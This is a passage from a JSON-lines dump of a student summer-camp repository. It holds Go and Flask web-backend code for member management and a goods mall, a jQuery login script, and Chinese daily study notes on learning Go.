user.Name})\n\t}\n\tif user.Nickname !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"nickname\": user.Nickname})\n\t}\n\tif user.Group !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"group\": user.Group})\n\t}\n\tif user.Password !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"password\": encryptions.Salt(user.Password)})\n\t}\n\tif user.Email !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"email\": user.Email})\n\t}\n\tif user.Phone !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"phone\": user.Phone})\n\t}\n\tu := models.Info{Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\nfunc (c *UserController) PageGroupList(){\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n}\n\n// 通过路由/manager/user/group,发送post请求,默认通过读取请求Json中User[0]的group值,列出该group中所以成员\nfunc (c *UserController) GroupList() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tgroup := ob.User[0].Group\n\tvar posts []class.User\n\to := orm.NewOrm()\n\to.QueryTable(\"user\").Filter(\"group\", group).Exclude(\"status\",\"apply\").All(&posts, \"id\", \"name\", \"nickname\", \"email\", \"phone\", \"group\", \"status\")\n\tfmt.Println(posts)\n\tu := models.Info{User:posts,Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}" }, { "alpha_fraction": 0.7571428418159485, "alphanum_fraction": 0.800000011920929, "avg_line_length": 10.833333015441895, "blob_id": "7151c20e415f061547765467a95093153170efcc", "content_id": "6d594c2a5425fb0b181012dbfec432429a0cd377", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 156, "license_type": "no_license", "max_line_length": 24, "num_lines": 6, "path": "/Shixiaoyanger/日报/7.13.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.13日报\n写出了大致的框架 虽然前后端没分离\n\n但是除了cookie和加密其他的功能基本都实现了\n\n具体内容已经push啦" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 4, "blob_id": "951609d0669efc336fc968589ea30135ff85d00e", "content_id": "2a8cc6a84e70cab78f593150e73027c2afb40d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 26, "license_type": "no_license", "max_line_length": 6, "num_lines": 3, "path": "/Old-Li883/日报/7.11.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.11\n\n忙于工程实训" }, { "alpha_fraction": 0.6327769160270691, "alphanum_fraction": 0.6418816447257996, "avg_line_length": 22.54464340209961, "blob_id": "ac5e3594239d6747f01fa83f6d56cbff5cd87fac", "content_id": "f727ebf58d423885c4e8c828fbe202c74e7c3bbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2696, "license_type": "no_license", "max_line_length": 90, "num_lines": 112, "path": "/jackwener/server/mall/controllers/admin.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"mall/models\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"github.com/astaxie/beego/orm\"\n)\n\nfunc (c *MainController) AddGoods() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\ttitle := ob.Good[0].Title\n\tkind := ob.Good[0].Kind\n\tprice := ob.Good[0].Price\n\tlocal := ob.Good[0].Local\n\tintro := ob.Good[0].Intro\n\tvar good models.Good\n\tgood.Intro = intro\n\tgood.Price = price\n\tgood.Kind = kind\n\tgood.Local = local\n\tgood.Id = title\n\tgood.Views = 0\n\to := orm.NewOrm()\n\t_, err := o.Insert(&good)\n\tvar reJson models.GoodJson\n\tif err == nil {\n\t\treJson.Status = 200\n\t\treJson.Message = \"添加成功\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\treJson.Status = 400\n\t\treJson.Message = \"添加失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n}\n\nfunc (c *MainController) DeleteGoods() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\ttitle := ob.Good[0].Title\n\to := orm.NewOrm()\n\t_, err := o.QueryTable(\"good\").Filter(\"title\",title).Delete()\n\tvar reJson models.GoodJson\n\tif err == nil {\n\t\treJson.Status = 200\n\t\treJson.Message = \"删除成功\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\treJson.Status = 400\n\t\treJson.Message = \"删除失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n}\n\nfunc (c *MainController) UpdateGoods() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tgood := ob.Good[0]\n\to := orm.NewOrm()\n\tif good.Local != \"\"{\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).Update(orm.Params{\"local\": good.Local})\n\t}\n\tif good.Intro != \"\"{\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).Update(orm.Params{\"intro\": good.Intro})\n\t}\n\tif good.Kind != \"\"{\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).Update(orm.Params{\"kind\": good.Kind})\n\t}\n\tif good.Price != 0{\n\t\tvar old models.Good\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).One(&old)\n\t\tif good.Price < old.Price {\n\t\t\tvar cars []*models.Car\n\t\t\t_, err := o.QueryTable(\"car\").Filter(\"Goods__Good__Title\", good.Title).All(&cars)\n\t\t\tif err == nil {\n\t\t\t\tvar name []string\n\t\t\t\tfor i, _ := range cars{\n\t\t\t\t\tname[i] = cars[i].Id\n\t\t\t\t}\n\t\t\t\tvar inform models.Inform\n\t\t\t\tfor _, name := range name{\n\t\t\t\t\tinform.Id = name\n\t\t\t\t\tvar user models.User\n\t\t\t\t\to.QueryTable(\"user\").Filter(\"name\",name).One(&user)\n\t\t\t\t\tinform.User = &user\n\t\t\t\t\tinform.Content = \"您收藏的商品\"+name+\"已经降价\"\n\t\t\t\t\to.Insert(&inform)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).Update(orm.Params{\"price\": good.Price})\n\t}\n\tvar reJson models.GoodJson\n\treJson.Status = 200\n\treJson.Message = \"修改成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}" }, { "alpha_fraction": 0.7246654033660889, "alphanum_fraction": 0.7323135733604431, "avg_line_length": 25.149999618530273, "blob_id": "b82bb2deb9dd4c41eab290fd18bac68d0f5cbec6", "content_id": "3213cbeba92ff08648e2f196f2e7501aa76df508", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 523, "license_type": "no_license", "max_line_length": 68, "num_lines": 20, "path": "/yixiaoer/server/src/project1/main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"github.com/labstack/echo\"\n\t\"project/controller\"\n)\n\nfunc main() {\n\te := echo.New()\n\n\te.POST(\"/login\", controller.Login)\n\te.POST(\"/sign-up\", controller.SignUp)\n\te.DELETE(\"/homepage/members-delete\", controller.DeleteMember)\n\te.POST(\"/homepage/groups-show\", controller.ShowGroup)\n\te.POST(\"/homepage/information-get\", controller.GetInformation)\n\te.PUT(\"/homepage/groups-add\", controller.AddGroup)\n\te.PUT(\"/homepage/information-change\", controller.ChangeInformation)\n\n\te.Logger.Fatal(e.Start(\":8080\"))\n}\n" }, { "alpha_fraction": 0.6644981503486633, "alphanum_fraction": 0.6756505370140076, "avg_line_length": 19.69230842590332, "blob_id": "2a0c05d463da73de79ae1fbe31dd11bc9e475317", "content_id": "f4adb0640c45900d5b9a40162c02f3633aa34f5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1092, "license_type": "no_license", "max_line_length": 80, "num_lines": 52, "path": "/jackwener/server/练手/controllers/permission.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"github.com/astaxie/beego/session\"\n\t\"strings\"\n\t\"hello/models\"\n\t\"fmt\"\n)\n\nvar globalSessions *session.Manager\n\nfunc init() {\n\tsessionConfig := &session.ManagerConfig{\n\t\tCookieName:\"gosessionid\",\n\t\tEnableSetCookie: true,\n\t\tGclifetime:3600,\n\t\tMaxlifetime: 3600,\n\t\tSecure: false,\n\t\tCookieLifeTime: 3600,\n\t\tProviderConfig: \"./tmp\",\n\t}\n\tglobalSessions, _ = session.NewManager(\"memory\",sessionConfig)\n\tgo globalSessions.GC()\n}\n\nfunc CheckLogin(c *UserController){\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n}\n" }, { "alpha_fraction": 0.6604264378547668, "alphanum_fraction": 0.6703068017959595, "avg_line_length": 23.653846740722656, "blob_id": "e1310a4d63b153b18de2d4e7304e3806c5ffd7ec", "content_id": "9891c43a5e7c4265596e6f3e35903d798585082c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3781, "license_type": "no_license", "max_line_length": 102, "num_lines": 78, "path": "/yixiaoer/日报/7.7.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.7周报\n\n## 今日计划\n1. 尝试pr\n2. 语言(Go)的学习\n3. 涉及知识的学习\n\n## 完成情况\n### 关于pull request\n (晚上尝试&了解)\n\n\n### 关于Go\n1. **range**(range 关键字用于 for 循环中迭代数组(array)、切片(slice)、通道(channel)或集合(map)的元素)\n- 在map中返回其中的key值\n-使用for...range循环\n 其中的value,是一个值拷贝,而不是元素本身\n2. **map**(无序的)\n- 定义除用关键字外还可以用make函数\n> 一种元素对(pair)的无序集合,pair 的一个元素是key,对应的另一个元素是value,所以这个结构也称为关联数组或字典。这是一种快速寻找值的理想结构:给定key,对应的value可以迅速定位。\n- comma-ok断言(类型断言)\n > value, ok := element.(T)\n > element:要判断的变量,element必须是interface类型\n > T:被判断的类型,普通类型\n > value:返回的值\n > ok:是否为该类型\n > 如果断言失败,ok为false,否则ok为true并且value为变量的值\n- delete( )函数删除集合中的元素\n delete(map,key)则删除map中对应key元素\n ```Go\n m := make(map[string]int)\n \n m[\"Answer\"] = 42 //在map m中插入或修改元素\n \n m[\"Answer\"] = 48\n \n delete(m, \"Answer\") //删除元素\n \n v, ok := m[\"Answer\"] 检测某个值是否存在\n ```\n3. **语言类型转换**\n4. **接口**(任何其他类型只要实现了这些方法就是实现了这个接口???)\n5. **goroutine与channel**\n 1. c.f.并发&并行\n> 并发是两个任务可以在重叠的时间段内启动,运行和完成;是独立执行过程的组合;是一次处理很多事情\n> 并行是任务在同一时间运行,例如,在多核处理器上;是同时执行(可能相关的)计算;是同时做很多事情\n> 应用程序可以是并发的,但不是并行的,这意味着它可以同时处理多个任务,但是没有两个任务在同一时刻执行\n> 应用程序可以是并行的,但不是并发的,这意味着它同时处理多核CPU中的任务的多个子任务\n> 一个应用程序可以既不是并行的,也不是并发的,这意味着它一次一个地处理所有任务\n> 应用程序可以即是并行的也是并发的,这意味着它同时在多核CPU中同时处理多个任务\n 2. goroutine\n 对进行的操作前加go,然后main中执行的操作就无需等待这步进行并一步一步进行操作\n 3. channel(主要做goroutine间变量共享和控制的)\n * <- 信道操作符\n ``` Go\n ch <- v // 将 v 发送至信道 ch,此时 <-是发送操作符\n v := <-ch // 从 ch 接收值并赋予 v,此时<-是接收操作符\n ```\n * 信道在使用前必须创建:\n ```Go\n ch := make(chan int)\n ```\n * 先进先出\n 在发送过程中进行的元素值属于完全复制(通道起一个传递作用,接受处即是在发送处的值,如果在发送后接收前对改值进行了操作,也不改变接受处的情况,且变量本身会有变化)\n * 用make函数(内建函数 make 用来为 slice,map 或 chan 类型分配内存和初始化一个对象)\n 4. 死锁(???)\n * 所有的线程或进程都在等待资源的释放\n * 非缓冲信道上如果发生了流入无流出,或者流出无流入,会导致了死锁,Go启动的所有goroutine里的非缓冲信道一定要一个线里存数据,一个线里取数据,要成对\n\n\n7. **if err !=nil{}**\n 用于判断是否有error且可以继续进行,并返回error\n\n### 关于认证\n- 当前后端分离时我们会因为同源策略而无法设置cookie和session\n\nto be continued\n明日继续\n" }, { "alpha_fraction": 0.6486486196517944, "alphanum_fraction": 0.7297297120094299, "avg_line_length": 4.4285712242126465, "blob_id": "645a5e6248d3fe1c00cd260ac432d78366e89bc9", "content_id": "d207228dc037ba65145c20384ee4676a0483e854", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 73, "license_type": "no_license", "max_line_length": 13, "num_lines": 7, "path": "/Old-Li883/日报/7.10.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.10\n\n看pyMySQL\n\n明日计划\n\n动手写一些,看相关项目例子" }, { "alpha_fraction": 0.6199332475662231, "alphanum_fraction": 0.6199332475662231, "avg_line_length": 20.84375, "blob_id": "52b9f2e8d3df9dc8a4abe651fc09846a2db66f7d", "content_id": "43108f96bd39c9983a26a6a3ef00d1c1101659a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2109, "license_type": "no_license", "max_line_length": 101, "num_lines": 96, "path": "/Old-Li883/热身任务代码/member2/mem_views/member_operate.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n视图函数\n\"\"\"\n\nfrom mem_views import app\nfrom flask import request, make_response\nfrom model.member_operation import mem_login, mem_register, find_no_register, group_member\nfrom model.member_operation import add_new_member, delete_member, change_member, find_all, mem_logout\n\n\[email protected]('/login', methods=['post'])\ndef login():\n \"\"\"\n member login\n \"\"\"\n\n data = request.get_json()\n id = data['id']\n password = data['password']\n return mem_login(id, password)\n\n\[email protected]('/register', methods=['post'])\ndef registered():\n \"\"\"\n member register\n \"\"\"\n\n data = request.get_json()\n id = data['id']\n password = data['password']\n name = data['name']\n email = data['email']\n groups = data['group']\n return mem_register(id, password, name, email, groups)\n\n\[email protected]('/no_register')\ndef no_register():\n return find_no_register()\n\n\[email protected]('/add_member', methods=['post'])\ndef add_member():\n data = request.get_json()\n id = data['id']\n password = data['password']\n name = data['name']\n email = data['email']\n groups = data['group']\n status = data['status']\n return add_new_member(id, password, name, email, groups, status)\n\n\[email protected]('/de_member', methods=['post'])\ndef de_member():\n data = request.get_json()\n id = data['id']\n return delete_member(id)\n\n\[email protected]('/cha_member', methods=['post'])\ndef cha_member():\n data = request.get_json()\n id = data['id']\n password = data['password']\n name = data['name']\n email = data['email']\n groups = data['group']\n return change_member(id, password, name, email, groups)\n\n\[email protected]('/fi_all')\ndef fi_all():\n return find_all()\n\n\[email protected]('/gro_member', methods=['post'])\ndef gro_member():\n data = request.get_json()\n groups = data['group']\n return group_member(groups)\n\n\[email protected]('/logout')\ndef logout():\n id = request.cookies.get(\"id\")\n return mem_logout(id)\n\n\[email protected](\"/delete_cookie\")\ndef delete_cookie():\n \"\"\"删除cookie\"\"\"\n resp = make_response(\"delete cookie ok\")\n resp.delete_cookie('id')\n return resp\n" }, { "alpha_fraction": 0.7121211886405945, "alphanum_fraction": 0.7121211886405945, "avg_line_length": 11.045454978942871, "blob_id": "5dd252eadfefea977464e11b6c96209e04222221", "content_id": "27f87073f94183720a9c75f4be89a26b2cda2c3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 286, "license_type": "no_license", "max_line_length": 24, "num_lines": 22, "path": "/jackwener/server/mall/models/json.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\n// 定义了返回的统一的Json格式\n\ntype UserJson struct {\n\tUser User\n\tStatus int\n\tMessage string\n}\n\ntype GoodJson struct {\n\tGood []Good\n\tStatus int\n\tMessage string\n\tUrl string\n}\n\ntype SearchJson struct {\n\tContent []string\n\tStatus int\n\tMessage string\n}" }, { "alpha_fraction": 0.7735849022865295, "alphanum_fraction": 0.8301886916160583, "avg_line_length": 16.66666603088379, "blob_id": "326effa107231219df3c035512bdae1f64deffad", "content_id": "1c8f1cfb9587257d56ccc954dd7203d3488e51ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 141, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/jackwener/日报/7.18.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.18日报\n\n今天没写什么东西,主要围绕着项目的实现想大概的实现,查资料,后面就可以开始实际动手了\n" }, { "alpha_fraction": 0.7884615659713745, "alphanum_fraction": 0.7884615659713745, "avg_line_length": 16.33333396911621, "blob_id": "53d7d126d56f9f4101e6f57a7defda54f9f9d77e", "content_id": "fbc3affeb663b0dad96e50ef2c4fd24c90171cf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 146, "license_type": "no_license", "max_line_length": 45, "num_lines": 3, "path": "/jackwener/server/README.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 练手\n\n基本做完了,经过了基本的重构,过了最基础的测试,没有健壮性(我很信任用户的输入,手动滑稽)\n" }, { "alpha_fraction": 0.7786885499954224, "alphanum_fraction": 0.7896174788475037, "avg_line_length": 16.4761905670166, "blob_id": "b6ff81d3d9d3339709eaa28ecb8b4d1099009bde", "content_id": "09747e57e3d1bcd85a22ccc73c03f251444e206c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 842, "license_type": "no_license", "max_line_length": 96, "num_lines": 21, "path": "/jackwener/日报/7.7.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 文杰7.7日报\n\n## 早上\n\n早上内容主要是学习go语言,看《go程序设计语言》这本书,主要是学习go语言基础语法,还有些特性内容(?)defer,匿名(函数式),异常(recover+panic+defer),方法,接口\n\n遇到的问题:\n\n1. defer()的坑,return函数不是原子操作,是赋值+ret。defer是按栈顺序压入然后弹出,弹出时间是赋值和ret之间。\n\nand so on(forget)\n\n疑惑: 总觉得自己是不是看的太慢了,急了导致学的东西忘的快,容易出问题,理解不深刻,稳点又怕是不是自己太菜学不动。\n\n## 下午\n\n看go web编程这本书,因为之前没怎么做过web,感觉速度还是比较慢的,另外google各种东西花的时间也比较多\n\n## 晚上\n\n摸鱼睡觉了2个小时,然后在动手尝试练手的任务" }, { "alpha_fraction": 0.38231196999549866, "alphanum_fraction": 0.3927576541900635, "avg_line_length": 34.92499923706055, "blob_id": "a5ccdfd7121b5b79921ba8d45d8121555442a520", "content_id": "391877fa171d8792d302c199d7ecc41f5bd32969", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 79, "num_lines": 40, "path": "/Old-Li883/mall/js/login.js", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "$(document).ready(function () {\n $(\"#submit\").click(function () {\n value = $(\"input:radio[name='who']:checked\").val();\n id = $(\"#id\").val();\n password = $('#password').val();\n jdata = { \"id\": id, \"password\": password };\n $.ajax({\n url: '/api/login?status=' + value,\n data: JSON.stringify(jdata),\n type: 'post',\n dataType: 'json',\n headers: {\n Accept: \"application/json\",\n \"Content-Type\": \"application/json\"\n },\n processData: false,\n cache: false\n }).done(function (data, status) {\n if (data['status'] == 200) {\n alert(\"degnluchegngong\");\n }\n else if (data['status'] == 403) {\n $(\"p\").remove(\"#note\");\n $(\"p\").append(\"<p id='note'>you have login</p>\");\n }\n else if (data['status'] == 400) {\n $(\"p\").remove(\"#note\");\n $(\"p\").append('<p id=\"note\">you have not been identified</p>');\n }\n else if (data['status'] == 401) {\n $(\"p\").remove(\"#note\");\n $(\"p\").append('<p id=\"note\">password wrong</p>');\n }\n else if (data['status'] == 402) {\n $(\"p\").remove(\"#note\");\n $(\"p\").append('<p id=\"note\">id wrong</p>');\n }\n });\n });\n});" }, { "alpha_fraction": 0.7648766040802002, "alphanum_fraction": 0.7648766040802002, "avg_line_length": 45, "blob_id": "3466a6f6f1bf514f63ae79564b8b45e5bf7d6f58", "content_id": "b90d7cff8038af765d027924ad4c99fc48ca637c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 689, "license_type": "no_license", "max_line_length": 106, "num_lines": 15, "path": "/jackwener/server/练手/routers/admin.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"hello/controllers\"\n\t\"github.com/astaxie/beego\"\n)\n\nfunc AdminInit() {\n\tbeego.Router(\"/manager/apply\", &controllers.UserController{}, `get:ListApply;post:UpdateApply`)\n\tbeego.Router(\"/manager/user\", &controllers.UserController{}, `get:UserList`)\n\tbeego.Router(\"/manager/user/add\", &controllers.UserController{}, `get:PageUserAdd;post:UserAdd`)\n\tbeego.Router(\"/manager/user/delete\", &controllers.UserController{}, `get:PageUserDelete;post:UserDelete`)\n\tbeego.Router(\"/manager/user/update\", &controllers.UserController{}, `get:PageUserUpdate;post:UserUpdate`)\n\tbeego.Router(\"/manager/user/group\", &controllers.UserController{}, `get:PageGroupList;post:GroupList`)\n}" }, { "alpha_fraction": 0.6248244643211365, "alphanum_fraction": 0.6374613642692566, "avg_line_length": 21.111801147460938, "blob_id": "72749079dc5fed24f967f674043be938f4b88e98", "content_id": "d159c85dc9bfe5ca8a9dd3552067ac1ab78a2242", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3727, "license_type": "no_license", "max_line_length": 100, "num_lines": 161, "path": "/Shixiaoyanger/market/models/Goods.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport (\n\t\"time\"\n\t\"github.com/astaxie/beego\"\n\t\"github.com/astaxie/beego/orm\"\n\t\"fmt\"\n\n\n\n)\ntype Goodses []Goods\n\ntype Goods struct{\n\tId \t\t int64 //\t`json:\"id\"`\n\tGoodsname \t string\t\t`json:\"goodsname\"`\t\n\tCategory \t string \t`json:\"category\"`\n\tPosition \t string\t\t`json:\"position\"`\n\tIntroduction string\t\t`json:\"introduction\"`\n\tTitle string\t\t`json:\"title\"`\n\tPrice int64\t\t`json:\"price\"`\n\tGoodviews int64\t\t`json:\"goodviews\"`\n\tViewtime int64\t\t`json:\"viewtime\"`\n}\n\n//locate goods by goodsname\nfunc Readgoods(goods *Goods) error{\n\to := orm.NewOrm()\n\tqs := o.QueryTable(\"goods\")\n\terr := qs.Filter(\"goodsname\",goods.Goodsname).One(&goods)\n\treturn err\n\t//err == nil goodsname has existed\n\t//err!= nil .....not exist\n\n}\n\n//添加商品\nfunc Addgoods(goods *Goods) (bool, error){\n\to := orm.NewOrm()\n\terr := Readgoods(goods)\n\tif err == nil{\n\t\treturn false, err //goodsname has existed\n\t}\n\t_,err =o.Insert(goods)\n\tif err != nil{\n\t\treturn false, err //faild to insert\n\t}\n\treturn true, nil\n}\n//删除商品\nfunc Deletegoods(goods *Goods) error {\n\to := orm.NewOrm()\n\t_,err := o.Delete(goods)\n\tif err!= nil{\n\t\treturn err\n\t}\n\treturn nil\n}\n\nfunc Updategoods(goods *Goods) error{\n\to := orm.NewOrm()\n\terr := Readgoods(goods)\n\tif err != nil{\n\t\treturn err//not exist\n\t}\n\t_,err =o.Update(goods,\"views\",\"viewtime\")\n\treturn err //update success\n}\n//浏览量+1\nfunc IncreGoodsViews(goods *Goods) {\n\to := orm.NewOrm()\n\tgoods.Goodviews += 1\n\to.Update(goods,\"goodviews\")\n}\nfunc UpadateViewtime(goods *Goods){\n\to := orm.NewOrm()\n\n\t\t // 获取当前(当地)时间\n\t\t t := time.Now()\n\t\t // 获取0时区时间\n\t\t t = time.Now().UTC()\n\t\t fmt.Println(t)\n\t\t // 获取当前时间戳\n\t\t timestamp := t.Unix()\n\t\t fmt.Println(timestamp)\n\t\t // 获取时区信息\n\t\t name, offset := t.Zone()\n\t\t fmt.Println(name, offset)\n\t\t // 把时间戳转换为时间\n\t\t currenttime := time.Unix(timestamp+int64(offset), 0)\n\t\t // 格式化时间\n\t\t fmt.Println(\"Current time : \", currenttime.Format(\"2006-01-02 15:04:05\"))\n\n\tgoods.Viewtime = timestamp\n\to.Update(goods,\"viewtime\")\n\n}\n\n/********************查找商品**************************/\nfunc SearchByCategory(category string) (bool, []*Goods){\n\to :=orm.NewOrm()\n\tvar goods []*Goods\n\tfmt.Println(\"123242423\")\n\t_,err := o.QueryTable(\"goods\").Filter(\"category\", category).All(&goods)//All(&goods,\"\",\"\")\n\tfor _,value := range goods{\n\t\tIncreGoodsViews(value)\n\t\tfmt.Println(value)\n\t}\n\tfmt.Println(\"eiwrh98233h9wn\")\n\treturn err!= orm.ErrNoRows, goods\n}\n\nfunc SearchByPosition(position string) (bool, []*Goods){\n\to :=orm.NewOrm()\n\tvar goods []*Goods\n\n\tnum,err := o.QueryTable(\"goods\").Filter(\"position\", position).All(&goods)\n\tfmt.Println(\"返回数据条数\",num,)\n\tfor _,value := range goods{\n\t\tIncreGoodsViews(value)\n\t\tUpadateViewtime(value)\n\t\tfmt.Println(value)\n\t}\n\treturn err!= orm.ErrNoRows, goods\n}\n\nfunc SearchById(id string) (bool, Goods){\n\to :=orm.NewOrm()\n\tvar goods Goods\n\terr := o.QueryTable(\"goods\").Filter(\"id\", id).One(&goods)\n\tIncreGoodsViews(&goods)\n\tUpadateViewtime(&goods)\n\treturn err!= orm.ErrNoRows, goods\n}\n\n/********************热门查询、最新查询 *******************************/\n//热门查询\nfunc PopularSearch() (error,[]*Goods){\n\tvar goods []*Goods\n\t _,err:= orm.NewOrm().Raw(\"SELECT * from goods order by goodviews desc limit 4\" ).QueryRows(&goods)\n\t if err != nil{\n\t\t beego.Error(err)\n\t\t fmt.Println(\"失败\")\n\t }\n\tfmt.Print(\"GJJH\",goods)\n\n\treturn err, goods\n}\n//最新查询\nfunc LatestSearch() (error, []*Goods){\n\tvar goods []*Goods\n\t _,err:= orm.NewOrm().Raw(\"SELECT * from goods order by viewtime desc limit 4\" ).QueryRows(&goods)\n\t if err != nil{\n\t\t beego.Error(err)\n\t\t fmt.Println(\"失败\")\n\t }\n\tfmt.Print(\"dsfsdfs\",goods)\n\n\treturn err, goods\n\n}\n\n" }, { "alpha_fraction": 0.4444444477558136, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 5, "blob_id": "2e07fa7fc5f15996d4a3469acf1c211a9169998b", "content_id": "eb382b5c84afbde265aa9f82ed1fc0f8621c38fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 36, "license_type": "no_license", "max_line_length": 9, "num_lines": 3, "path": "/jackwener/日报/7.20.md", "repo_name": 